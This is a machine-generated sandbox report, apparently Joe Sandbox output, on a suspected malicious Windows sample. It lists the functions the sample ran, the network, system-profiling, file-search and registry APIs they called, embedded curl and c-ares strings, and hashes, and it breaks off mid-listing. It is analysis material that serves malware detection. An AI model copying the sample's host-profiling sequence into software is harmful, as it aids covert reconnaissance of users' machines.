278bfc 69740 278c35 69736->69740 69741 278c1f connect 69736->69741 69747 278cb2 69736->69747 69736->69749 69737 278cd9 SleepEx getsockopt 69738 278d18 69737->69738 69742 278d43 69738->69742 69738->69747 69739 27a150 getsockname 69746 278dff 69739->69746 69744 27a150 getsockname 69740->69744 69741->69740 69745 27a150 getsockname 69742->69745 69748 278ba1 69744->69748 69745->69749 69746->69749 69766 2478b0 closesocket 69746->69766 69747->69739 69747->69746 69747->69749 69748->69737 69748->69747 69748->69749 69751 27a575 69750->69751 69754 27a597 69751->69754 69768 2475e0 69751->69768 69753 2478b0 closesocket 69756 27a713 69753->69756 69755 27a811 setsockopt 69754->69755 69761 27a83b 69754->69761 69763 27a69b 69754->69763 69755->69761 69756->69736 69758 27af56 69759 27af5d 69758->69759 69758->69763 69759->69756 69760 27a150 getsockname 69759->69760 69760->69756 69761->69763 69764 27abe1 69761->69764 69774 276be0 select closesocket 69761->69774 69763->69753 69763->69756 69764->69763 69773 2a67e0 ioctlsocket 69764->69773 69765->69748 69767 2478c5 69766->69767 69767->69749 69769 247607 socket 69768->69769 69770 2475ef 69768->69770 69771 24762b 69769->69771 69770->69769 69772 247643 69770->69772 69771->69754 69772->69754 69773->69758 69774->69764 69775 24255d 69776 5c9f70 69775->69776 69777 24256c GetSystemInfo 69776->69777 69778 242589 69777->69778 69779 2425a0 GlobalMemoryStatusEx 69778->69779 69785 2425ec 69779->69785 69780 242762 69783 2427d6 KiUserCallbackDispatcher 69780->69783 69781 24263c GetDriveTypeA 69782 242655 GetDiskFreeSpaceExA 69781->69782 69781->69785 69782->69785 69784 2427f8 69783->69784 69786 242842 SHGetKnownFolderPath 69784->69786 69785->69780 69785->69781 69787 2428c3 69786->69787 69788 2428d9 FindFirstFileW 69787->69788 69789 242906 FindNextFileW 69788->69789 69790 242928 69788->69790 69789->69789 69789->69790 69791 243d5e 69795 243d30 69791->69795 69792 243d90 69800 24fcb0 closesocket 69792->69800 69795->69791 69795->69792 69797 250ab0 69795->69797 69796 243dc1 69801 2505b0 69797->69801 69799 250acd 69799->69795 69800->69796 69804 2507c7 69801->69804 69806 2505bd 69801->69806 69802 250707 WSAEventSelect 69802->69804 69802->69806 69803 2507ef 69803->69804 69807 250847 69803->69807 69811 256fa0 69803->69811 69804->69799 69806->69802 69806->69803 69806->69804 69808 2476a0 send 69806->69808 69807->69804 69809 2509e8 WSAEnumNetworkEvents 69807->69809 69810 2509d0 WSAEventSelect 69807->69810 69808->69806 69809->69807 69809->69810 69810->69807 69810->69809 69813 256fd4 69811->69813 69814 256feb 69811->69814 69812 257207 select 69812->69814 69813->69812 69813->69814 69814->69807 69571 2429ff FindFirstFileA 69572 242a31 69571->69572 69573 242a5c RegOpenKeyExA 69572->69573 69574 242a93 69573->69574 69575 242ade CharUpperA 69574->69575 69576 242b0a 69575->69576 69577 242bf9 QueryFullProcessImageNameA 69576->69577 69578 242c3b CloseHandle 69577->69578 69579 242c64 69578->69579 69580 242df1 CloseHandle 69579->69580 69581 242e23 69580->69581 69582 251139 69583 250f00 69582->69583 69584 250f7b 69583->69584 69586 27d4d0 closesocket 69583->69586 69586->69583 69587 6c7830 69600 5cdd50 69587->69600 69589 6c7866 69590 6c785a 69590->69589 69603 5d12c0 69590->69603 69592 6c78a6 69593 6c789a 69593->69592 69594 6c7950 69593->69594 69598 6c7906 69593->69598 69607 5cb500 _lock 69594->69607 69595 6c7944 69597 6c7979 69598->69595 69608 5cb500 _lock 69598->69608 69609 5d7430 69600->69609 69602 5cdd61 69602->69590 69604 5d12cc 69603->69604 69613 5ce050 69604->69613 69606 5d12fa 69606->69593 69607->69597 69608->69597 69611 5d7444 69609->69611 69610 5d7458 69610->69602 69611->69610 69612 5d747c _lock 69611->69612 69612->69602 69620 5ce09d 69613->69620 69623 5ce503 69613->69623 69614 5cfeb6 isxdigit 69614->69623 69615 5ce18e 69616 5ced90 ungetc 69615->69616 69619 5ce1a6 69615->69619 69616->69619 69617 5d0250 ungetc 69617->69623 69618 5d11a4 ungetc 69618->69623 69619->69606 69620->69615 69620->69619 69620->69623 69624 5ce388 69620->69624 69625 5ce243 69620->69625 69621 5d08d7 ungetc 69621->69623 69622 5d0742 ungetc 69622->69619 69623->69614 69623->69617 69623->69618 69623->69619 69623->69621 69623->69625 69626 5d0006 ungetc 69623->69626 69627 5d0e3e ungetc 69623->69627 69624->69619 69624->69623 69628 5d00b8 ungetc 69624->69628 69625->69619 69625->69622 69626->69623 69627->69623 69628->69624 69629 5cb180 Sleep 69815 2f5a50 69816 2f5a58 69815->69816 69820 2f5ea0 69815->69820 69817 2f5b50 69816->69817 69827 2f5a99 69816->69827 69830 2f5b88 69816->69830 69821 2f5b7a 69817->69821 69822 2f5eb4 69817->69822 69817->69830 69818 2f5e96 69845 309480 closesocket 69818->69845 69836 2f70a0 69821->69836 69846 2f6f10 socket ioctlsocket connect getsockname closesocket 69822->69846 69825 2f5ec2 69825->69825 69829 2f70a0 6 API calls 69827->69829 69827->69830 69843 2f6f10 socket ioctlsocket connect getsockname closesocket 69827->69843 69829->69827 69830->69818 69832 30a920 69830->69832 69844 309320 closesocket 69830->69844 69833 30a944 69832->69833 69834 30a94b 69833->69834 69835 30a977 send 69833->69835 69834->69830 69835->69830 69839 2f70ae 69836->69839 69838 2f71a7 69838->69830 69839->69838 69840 2f717f 69839->69840 69847 30a8c0 69839->69847 69851 2f71c0 socket ioctlsocket connect getsockname 69839->69851 69840->69838 69852 309320 closesocket 69840->69852 69843->69827 69844->69830 69845->69820 69846->69825 69848 30a903 recvfrom 69847->69848 69849 30a8e6 69847->69849 69850 30a8ed 69848->69850 69849->69848 69849->69850 69850->69839 69851->69839 69852->69838

                                                          Executed Functions

                                                          Function 0027F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 581bffb8864e1519223e02d9b35279857bed505f39eba62aebd74d6d99268b35
                                                          • Instruction ID: dd1eb58de45173502894a9e172dae87c496a8b46f30acc801bab300be9eec30b
                                                          • Opcode Fuzzy Hash: 581bffb8864e1519223e02d9b35279857bed505f39eba62aebd74d6d99268b35
                                                          • Instruction Fuzzy Hash: F3C2C031A183459FD764DF28C584B6AB7E1BF84314F05C66DEC9C8B2A2D770E9A4CB81
                                                          Function 0024255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00242579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002425CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00242647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0024267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 002427E2
                                                          • SHGetKnownFolderPath.SHELL32 ref: 0024286D
                                                          • FindFirstFileW.KERNELBASE ref: 002428F8
                                                          • FindNextFileW.KERNELBASE ref: 0024291F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                          • String ID: ;%$$@$`
                                                          • API String ID: 2066228396-2302490886
                                                          • Opcode ID: 07b446268f85d2f9ded73d6ea5b1909f4dbc9119097e5efddea9a82f5a365715
                                                          • Instruction ID: 9fb56d4148005850171cfad1033df88bf3c4cdce7ec1da0f9b93f57e04bca4cc
                                                          • Opcode Fuzzy Hash: 07b446268f85d2f9ded73d6ea5b1909f4dbc9119097e5efddea9a82f5a365715
                                                          • Instruction Fuzzy Hash: 1FD184B4909319DFCB50EFA8C98569EBBF0FF44344F00896DE89897251E7749A84CF92
                                                          Function 002429FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1352 2429ff-242a2f FindFirstFileA 1353 242a31-242a36 1352->1353 1354 242a38 1352->1354 1355 242a3d-242a91 call 6c9c50 call 6c9ce0 RegOpenKeyExA 1353->1355 1354->1355 1360 242a93-242a98 1355->1360 1361 242a9a 1355->1361 1362 242a9f-242b0c call 6c9c50 call 6c9ce0 CharUpperA call 5c8da0 1360->1362 1361->1362 1370 242b15 1362->1370 1371 242b0e-242b13 1362->1371 1372 242b1a-242b92 call 6c9c50 call 6c9ce0 call 5c8e80 call 5c8e70 1370->1372 1371->1372 1381 242b94-242ba3 1372->1381 1382 242bcc-242c66 QueryFullProcessImageNameA CloseHandle call 5c8da0 1372->1382 1385 242ba5-242bae 1381->1385 1386 242bb0-242bca call 5c8e68 1381->1386 1392 242c6f 1382->1392 1393 242c68-242c6d 1382->1393 1385->1382 1386->1381 1386->1382 1394 242c74-242ce9 call 6c9c50 call 6c9ce0 call 5c8e80 call 5c8e70 1392->1394 1393->1394 1403 242dcf-242e1c call 6c9c50 call 6c9ce0 CloseHandle 1394->1403 1404 242cef-242d49 call 5c8bb0 call 5c8da0 1394->1404 1414 242e23-242e2e 1403->1414 1415 242d99-242dad 1404->1415 1416 242d4b-242d63 call 5c8da0 1404->1416 1417 242e37 1414->1417 1418 242e30-242e35 1414->1418 1415->1403 1416->1415 1424 242d65-242d7d call 5c8da0 1416->1424 1420 242e3c-242ed6 call 6c9c50 call 6c9ce0 1417->1420 1418->1420 1433 242ed8-242ee1 1420->1433 1434 242eea 1420->1434 1424->1415 1430 242d7f-242d97 call 5c8da0 1424->1430 1430->1415 1438 242daf-242dc9 call 5c8e68 1430->1438 1433->1434 1436 242ee3-242ee8 1433->1436 1437 242eef-242f16 call 6c9c50 call 6c9ce0 1434->1437 1436->1437 1438->1403 1438->1404
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: 2f50169be6c3ab3165ca80e5747a5c356540702fdf8a449c4709c3ada34cd79a
                                                          • Instruction ID: d38ea76ec68e6e690342793f960967ca824106ad77ab397ea48c8ffe40dbd054
                                                          • Opcode Fuzzy Hash: 2f50169be6c3ab3165ca80e5747a5c356540702fdf8a449c4709c3ada34cd79a
                                                          • Instruction Fuzzy Hash: 20E1D4B4918209DFCB50EFA9D9857ADBBF4AF44304F40886DE888D7350E7789958CF42
                                                          Function 002505B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1597 2505b0-2505b7 1598 2505bd-2505d4 1597->1598 1599 2507ee 1597->1599 1600 2507e7-2507ed 1598->1600 1601 2505da-2505e6 1598->1601 1600->1599 1601->1600 1602 2505ec-2505f0 1601->1602 1603 2507c7-2507cc 1602->1603 1604 2505f6-250620 call 257350 call 2470b0 1602->1604 1603->1600 1609 250622-250624 1604->1609 1610 25066a-25068c call 27dec0 1604->1610 1612 250630-250655 call 2470d0 call 2503c0 call 257450 1609->1612 1615 2507d6-2507e3 call 257380 1610->1615 1616 250692-2506a0 1610->1616 1636 2507ce 1612->1636 1637 25065b-250668 call 2470e0 1612->1637 1615->1600 1620 2506f4-2506f6 1616->1620 1621 2506a2-2506a4 1616->1621 1623 2506fc-2506fe 1620->1623 1624 2507ef-25082b call 253000 1620->1624 1626 2506b0-2506e4 call 2573b0 1621->1626 1628 25072c-250754 1623->1628 1640 250831-250837 1624->1640 1641 250a2f-250a35 1624->1641 1626->1615 1642 2506ea-2506ee 1626->1642 1632 250756-25075b 1628->1632 1633 25075f-25078b 1628->1633 1638 250707-250719 WSAEventSelect 1632->1638 1639 25075d 1632->1639 1654 250791-250796 1633->1654 1655 250700-250703 1633->1655 1636->1615 1637->1610 1637->1612 1638->1615 1647 25071f 1638->1647 1648 250723-250726 1639->1648 1650 250861-25087e 1640->1650 1651 250839-250842 call 256fa0 1640->1651 1644 250a37-250a3a 1641->1644 1645 250a3c-250a52 1641->1645 1642->1626 1643 2506f0 1642->1643 1643->1620 1644->1645 1645->1615 1652 250a58-250a81 call 252f10 1645->1652 1647->1648 1648->1624 1648->1628 1661 250882-25088d 1650->1661 1660 250847-25084c 1651->1660 1652->1615 1670 250a87-250a97 call 256df0 1652->1670 1654->1655 1659 25079c-2507c2 call 2476a0 1654->1659 1655->1638 1659->1655 1664 250852 1660->1664 1665 250a9c-250aa4 1660->1665 1668 250970-250975 1661->1668 1669 250893-2508b1 1661->1669 1664->1650 1667 250854-25085f 1664->1667 1665->1615 1667->1661 1671 250a19-250a2c 1668->1671 1672 25097b-250989 call 2470b0 1668->1672 1673 2508c8-2508f7 1669->1673 1670->1615 1671->1641 1672->1671 1680 25098f-25099e 1672->1680 1681 2508fd-250925 1673->1681 1682 2508f9-2508fb 1673->1682 1683 2509b0-2509c1 call 2470d0 1680->1683 1684 250928-25093f 1681->1684 1682->1684 1688 2509a0-2509ae call 2470e0 1683->1688 1689 2509c3-2509c7 1683->1689 1690 250945-25096b 1684->1690 1691 2508b3-2508c2 1684->1691 1688->1671 1688->1683 1693 2509e8-250a03 WSAEnumNetworkEvents 1689->1693 1690->1691 1691->1668 1691->1673 1695 250a05-250a17 1693->1695 1696 2509d0-2509e6 WSAEventSelect 1693->1696 1695->1696 1696->1688 1696->1693
                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00250711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002509DC
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002509FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N=$$multi.c
                                                          • API String ID: 2170980988-1094639679
                                                          • Opcode ID: f56775723b58ae4eb70549b3c4d87171c71a68442df30f979a887e3de2ac1014
                                                          • Instruction ID: 82c10143263de4778823c845b0975edb38122dcd88e5091e45a520972f4cba3c
                                                          • Opcode Fuzzy Hash: f56775723b58ae4eb70549b3c4d87171c71a68442df30f979a887e3de2ac1014
                                                          • Instruction Fuzzy Hash: 77D1BF716283029FEB10CF64CC85B6BB7E9BF94345F04482CFD9486241E7B4E968CB56
                                                          Function 0030B180 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 323COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1697 30b180-30b195 1698 30b3e0-30b3e7 1697->1698 1699 30b19b-30b1a2 1697->1699 1700 30b1b0-30b1b9 1699->1700 1700->1700 1701 30b1bb-30b1bd 1700->1701 1701->1698 1702 30b1c3-30b1d0 1701->1702 1704 30b1d6-30b1f2 1702->1704 1705 30b3db 1702->1705 1706 30b229-30b22d 1704->1706 1705->1698 1707 30b233-30b246 1706->1707 1708 30b3e8-30b417 1706->1708 1709 30b260-30b264 1707->1709 1710 30b248-30b24b 1707->1710 1715 30b582-30b589 1708->1715 1716 30b41d-30b429 1708->1716 1711 30b269-30b286 call 30af30 1709->1711 1712 30b215-30b223 1710->1712 1713 30b24d-30b256 1710->1713 1725 30b2f0-30b301 1711->1725 1726 30b288-30b2a3 call 30b060 1711->1726 1712->1706 1718 30b315-30b33c call 5c8b00 1712->1718 1713->1711 1719 30b435-30b44c call 30b590 1716->1719 1720 30b42b-30b433 call 30b590 1716->1720 1728 30b342-30b347 1718->1728 1729 30b3bf-30b3ca 1718->1729 1736 30b458-30b471 call 30b590 1719->1736 1737 30b44e-30b456 call 30b590 1719->1737 1720->1719 1725->1712 1746 30b307-30b310 1725->1746 1742 30b200-30b213 call 30b020 1726->1742 1743 30b2a9-30b2c7 getsockname call 30b020 1726->1743 1733 30b384-30b38f 1728->1733 1734 30b349-30b358 1728->1734 1738 30b3cc-30b3d9 1729->1738 1733->1729 1741 30b391-30b3a5 1733->1741 1740 30b360-30b382 1734->1740 1755 30b473-30b487 1736->1755 1756 30b48c-30b4a7 1736->1756 1737->1736 1738->1698 1740->1733 1740->1740 1747 30b3b0-30b3bd 1741->1747 1742->1712 1753 30b2cc-30b2dd 1743->1753 1746->1738 1747->1729 1747->1747 1753->1712 1757 30b2e3 1753->1757 1755->1715 1758 30b4b3-30b4cb call 30b660 1756->1758 1759 30b4a9-30b4b1 call 30b660 1756->1759 1757->1746 1764 30b4d9-30b4f5 call 30b660 1758->1764 1765 30b4cd-30b4d5 call 30b660 1758->1765 1759->1758 1770 30b4f7-30b50b 1764->1770 1771 30b50d-30b52b call 30b770 * 2 1764->1771 1765->1764 1770->1715 1771->1715 1776 30b52d-30b531 1771->1776 1777 30b580 1776->1777 1778 30b533-30b53b 1776->1778 1777->1715 1779 30b578-30b57e 1778->1779 1780 30b53d-30b547 1778->1780 1779->1715 1780->1779 1781 30b549-30b54d 1780->1781 1781->1779 1782 30b54f-30b558 1781->1782 1782->1779 1783 30b55a-30b576 call 30b870 * 2 1782->1783 1783->1715 1783->1779
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0030B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: XLm$`Lm$ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-3601239157
                                                          • Opcode ID: 1d3b353f5564220c2138a91192ed78b1040ea9a9e49b07f6757d0d97531ed4ff
                                                          • Instruction ID: 7b7fbb1e717acbc15ff4b44462e4da61ea0f5e6aefe71105fe914861db7e6078
                                                          • Opcode Fuzzy Hash: 1d3b353f5564220c2138a91192ed78b1040ea9a9e49b07f6757d0d97531ed4ff
                                                          • Instruction Fuzzy Hash: E6C18F716063059FD719DF28C8A0A6AB7E1FF89304F15886CE8499B3E2DB31ED45CB81
                                                          Function 00256FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
